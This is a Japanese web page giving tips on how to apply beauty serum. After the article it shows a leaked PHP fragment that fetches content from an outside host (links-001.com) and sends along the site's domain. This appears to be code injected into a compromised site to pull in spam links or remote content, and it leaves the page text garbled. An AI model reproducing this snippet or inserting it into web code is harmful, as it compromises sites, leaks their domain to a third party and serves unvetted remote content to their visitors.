前へ
次へ

効果を出すための美容液の正しい使い方

保湿や美白などの有効成分を角質層に届けるのが美容液です。
値段は他の製品よりも高めですが、効果はそれだけで安いのが特徴です。
美白やエイジングなど目的をもって美容液を使用するといいでしょう。
しかし、どんなに高級な美容液でも正しい使い方をしないと効果が半減してしまいます。
まずは肌を洗顔料で汚れを落とし、化粧水を顔全体になじませます。
この後に美容液を塗り、クリームや乳液などは最後にしましょう。
ただし、化粧水の前に使うタイプもあるので事前に確認してください。
まず、美容液を手のひらで温めたら気になる部分に塗り込んでいきます。
手のひらや指の腹を使ってやさしく浸透させていきましょう。
1回の量は製品の説明指示に従って適量を使いましょう。
美容液は回数を重ねて効果を出していくので、1度に多量に塗ってもあまり意味はありません。
反対に指定する量よりも少ないと効果が出づらくなります。
大体の製品は1回のプッシュやスポイト1回分を適量としています。
まずは説明書を読んでから使いましょう。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top